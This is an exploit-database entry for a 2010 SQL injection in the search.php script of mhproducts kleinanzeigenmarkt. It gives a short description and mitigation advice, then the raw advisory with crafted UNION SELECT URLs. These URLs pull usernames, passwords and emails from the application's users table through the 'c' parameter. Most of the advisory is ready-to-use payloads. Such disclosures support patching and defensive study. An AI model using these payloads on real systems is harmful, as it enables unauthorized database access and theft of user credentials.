header-logo
Suggest Exploit
vendor:
kleinanzeigenmarkt
by:
Easy Laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: kleinanzeigenmarkt
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

mhproducts kleinanzeigenmarkt search.php SQL Injection

A SQL injection vulnerability exists in mhproducts kleinanzeigenmarkt search.php, which allows an attacker to execute arbitrary SQL commands on the underlying database. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable application. This can result in the disclosure of sensitive information, such as user credentials, or the manipulation of data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : mhproducts kleinanzeigenmarkt search.php SQL Injection
+Autor : Easy Laster
+Date   : 09.03.2010
+Script  : mhproducts kleinanzeigenmarkt 
+Download : ----------------
+Price : 9,99 €
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/portal/search.php?c=

#username 
+Exploitable   : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2,
3,4,5,convert(name using utf8),7,8,9,10,11,12,13,14,15+from+users--+

#user pass
+Exploitable   : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2,
3,4,5,convert(password using utf8),7,8,9,10,11,12,13,14,15+from+users--+

or

+Exploitable   : http://www.site.com/portal/search.php?c=-999999'+union+select+1,2,
3,4,5,concat(name,0x3a,password,0x3a,email)7,8,9,10,11,12,13,14,15+from+users--+


-----------------------------------------------------------------------------------------